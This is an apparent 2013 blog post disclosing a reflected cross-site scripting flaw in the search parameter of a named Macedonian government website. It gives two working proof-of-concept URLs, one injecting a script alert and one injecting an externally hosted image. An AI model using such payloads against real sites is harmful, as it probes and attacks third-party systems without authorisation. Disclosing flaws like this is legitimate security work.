This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Перейти вверх
18.97.14.89.US.SSL

The Administration for Security and Counterintelligence of Republic of Macedonia - XSS

Vulnerable page: http://www.mvr.gov.mk/DesktopDefault.aspx

PoC:

Код
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><script>alert(String.fromCharCode(88,83,83))</script>

Код
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Написано Neo в 2013-12-10 11:29 0 likes

Комментарии

There are no comments for this news article, you can leave one here.